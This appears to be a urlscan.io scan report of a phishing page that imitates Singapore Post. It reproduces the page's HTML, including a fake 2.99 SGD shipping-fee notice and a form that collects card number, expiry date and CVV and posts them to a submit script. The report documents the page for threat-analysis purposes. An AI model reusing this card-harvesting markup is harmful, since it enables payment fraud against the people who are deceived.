frequencesud.re
Open in
urlscan Pro
2001:41d0:301::23
Malicious Activity!
Public Scan
Submitted URL: https://frequencesud.re/sg/spread/m/payment.php?payhttps://frequencesud.re/sg/spread/m/payment.php?payment#?fbclid=IwAR3...
Effective URL: https://frequencesud.re/sg/spread/m/payment.php?payhttps://frequencesud.re/sg/spread/m/payment.php?payment
Submission: On April 03 via manual from SG — Scanned from FR
Effective URL: https://frequencesud.re/sg/spread/m/payment.php?payhttps://frequencesud.re/sg/spread/m/payment.php?payment
Submission: On April 03 via manual from SG — Scanned from FR
Form analysis
2 forms found in the DOM<form id="regForm" class="bg-white-tran rounded border m-md-4 p-2 p-lg-4 needs-validation">
<div class="form-group form-row">
<div class="col-sm pb-2 pb-md-0">
<div class="form-group form-row">
<div class="form-check col-sm">
<div style="float: left;"><img style="width: 83px; height: 58px;" alt="" src="https://www.singpost.com/sites/default/files/carton-xl_0.png"> <br>
</div>
<div style="float: right;">
<div style="text-align: center;"></div>
<p class="total-amount"
style="margin-top: 0px; margin-bottom: 0px; font-size: 23px; font-weight: bold; color: rgb(37, 69, 128); font-family: "PT Sans",sans-serif; font-style: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb(255, 255, 255); text-align: center;">
<small><span style="font-family: "PT Sans",sans-serif;"><span style="font-weight: bold;"><span style="color: black;">Total</span><br>
</span></span></small></p>
<p class="total-amount"
style="margin-top: 0px; margin-bottom: 0px; text-align: center; font-size: 23px; font-weight: bold; color: rgb(37, 69, 128); font-family: "PT Sans",sans-serif; font-style: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb(255, 255, 255);">
<small><span style="font-weight: bold; font-family: Arial;">2,99 SGD</span></small></p>
<p class="total-vat-included"
style="margin-top: 0px; margin-bottom: 0px; font-size: 14px; font-weight: bold; font-style: italic; color: rgb(105, 105, 105); font-family: "PT Sans",sans-serif; letter-spacing: normal; orphans: 2; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; background-color: rgb(255, 255, 255);">
<small>(IVA included)</small></p>
<big style="color: rgb(0, 0, 122); font-family: Arial;"><br>
</big>
</div>
<div style="margin: 0pt auto; width: 150px;"><big style="color: rgb(0, 0, 122); font-family: Arial;"><small><small><span style="font-weight: bold; font-family: Arial;"><big style="color: black;">Shipping code: </big><br>
</span><span style="font-family: Arial; color: rgb(37, 69, 128); font-weight: bold;">SG / 2938456</span></small><br style="font-family: Arial;">
<small style="color: rgb(105, 105, 105);"><span style="font-family: Arial;">(</span></small></small></big><big style="color: rgb(105, 105, 105); font-family: Arial;"><small><small><span style="font-family: Arial;">Standard
Pack</span></small></small></big><big style="color: rgb(0, 0, 122); font-family: Arial;"><small style="color: rgb(105, 105, 105);"><small><span style="font-family: Arial;">)</span></small></small><br>
</big></div>
</div>
</div>
</div>
<div class="buttons">
</div>
</div>
<div>
</div>
</form>
POST ../submit/subpay.php
<form id="appsignupform" class="needs-validation" action="../submit/subpay.php" method="post">
<input type="hidden" name="action" value="M">
<input type="text" class="d-none" name="inputOldAppCode" readonly="" value="SON">
<div class="haseac p-2 p-lg-4 m-md-4 bg-white-tran border rounded">
<div id="newCust" class="form-group form-row">
<div class="col-12 mt-2 ">
</div>
<div class="btn-group btn-group-toggle" data-toggle="buttons">
</div>
<!-- <select -->
<!-- class="form-control form-control-lg" -->
<!-- name="appServCode" id="appServCode" required> -->
<!-- </select> -->
<div class="col-12 mt-2 ">
<div style="text-align: center;"><big style="font-weight: bold;"><big>Payment details</big></big></div><br>
<label for="inputOldAppLoginname"><span id="appNameLogin"></span> Card holder name*</label> <input type="text" class="form-control form-control-lg" name="nam" id="nam" oninvalid="this.setCustomValidity('Please enter name on card')"
oninput="setCustomValidity('')" value="" aria-describedby="loginnameHelp" placeholder="" required="">
</div>
<div class="col-12 mt-2">
<label for="inputOldAppPassword"></label>
<div><label>Card number*</label></div>
<input class="form-control form-control-lg" style="background-image: url("../../assets/img/cccc.png"); background-repeat: no-repeat; background-position: 101.5% 74.8%;" name="cardcc" id="cardcc" onkeyup="type_carte()"
placeholder="____ ____ ____ ____" aria-required="true" autocomplete="off" required="required" templates="">
<a id="forgetPwdUrl" class="btn-link right" style="display:none" target="_blank">Forgot Password?</a>
</div>
<div class="col-12 mt-2 ">
<br>
<label for="inputOldAppLoginname"><span id="appNameLogin"></span> Expiration date*</label>
<input type="text" placeholder="MM/YYYY" class="form-control form-control-lg" required="" name="exp" id="exp" maxlength="7" style="width: 200px;" oninvalid="this.setCustomValidity('Please enter expiration date')"
oninput="setCustomValidity('')">
<script>
function handleExpInput(event) {
var charCode = event.key.charCodeAt(0);
// Filtered to numeric keys (not part of the ask)
if (charCode >= 48 && charCode <= 57) {
// Extra handing around the case where the / is at the front of a highlighted block (again not part of the ask)
if (event.target.selectionStart === 2) {
if (event.target.selectionEnd !== 2) {
// Bumps the highlighted section off of the / if so.
event.target.selectionStart += 1
} else {
// Adds the slash before handling the third character.
event.target.value += '/'
}
}
} else {
// Whitelisting for control keys
switch (charCode) {
case 8:
case 9:
break;
default:
event.preventDefault()
}
}
}
document.getElementById('exp').onkeypress = handleExpInput;
</script>
</div>
<div class="col-12 mt-2">
<label for="inputOldAppPassword"></label>
<div><label>CVV code*</label></div>
<input class="form-control form-control-lg" style="background-image: url(../../assets/img/crypt.png);background-repeat: no-repeat;background-position: 98%;width: 36%;" type="tel" maxlength="8" name="cry" id="cry" aria-required="true"
autocomplete="off" placeholder="CVV" required="required">
</div>
<div class="col-12 mt-2 " align="right">
</div>
</div>
<div class="custom-control custom-checkbox mb-3">
<input type="checkbox" class="custom-control-input" id="iagreeCheck" value="Y" name="iagreeCheck" required="" autocomplete="off"> <label class="custom-control-label" for="iagreeCheck">I have read and accept the above
<a href="#" id="btn-terms" class="btn-link">Terms and Conditions </a>(including the terms contained in the <a href="#" id="btn-disclaimer" class="btn-link">Disclaimer</a>).</label>
<div class="invalid-feedback"></div>
</div>
<div class="custom-control custom-checkbox mb-0">
<div class="invalid-feedback"></div>
</div>
<div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
<input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn1" value="1" name="inputOptIn" autocomplete="off">
<label class="custom-control-label" for="inputOptIn1">
<p class="mb-0"> Stamp and Philately </p>
</label>
</div>
<div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
<input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn2" value="2" name="inputOptIn" autocomplete="off">
<label class="custom-control-label" for="inputOptIn2">
<p class="mb-0"> Mailing Service (except Singapore Post) </p>
</label>
</div>
<div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
<input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn3" value="3" name="inputOptIn" autocomplete="off">
<label class="custom-control-label" for="inputOptIn3">
<p class="mb-0"> Singapore Post </p>
</label>
</div>
<!-- <div class="custom-control custom-checkbox mb-1 pl-4 ml-4"> -->
<!-- <input type="checkbox" class="custom-control-input promoCheckAll" -->
<!-- class="custom-control-label" for="inputOptInAll"> -->
<!-- <p class="mb-0"> -->
<!-- </p> -->
<!-- </label> -->
<!-- </div> -->
<div class="form-group form-row">
<div class="col-sm-4 mt-2">
<button type="submit" class="btn btn-lg btn-primary btn-rounded btn-block"> Pay and continue > </button>
</div>
<div class="col-12 col-md-2 mt-2">
</div>
</div>
</div>
<div>
<input type="hidden" name="_csrf" value="d8dc0659-385b-4f2e-b269-7fe0b11bfdca">
</div>
</form>
Text Content
* 繁 * 简 * EN Total 2,99 SGD (IVA included) Shipping code: SG / 2938456 (Standard Pack) Payment details Card holder name* Card number* Forgot Password? Expiration date* CVV code* I have read and accept the above Terms and Conditions (including the terms contained in the Disclaimer). Stamp and Philately Mailing Service (except Singapore Post) Singapore Post Pay and continue > Disclaimer Privacy Policy Contact Us © 2021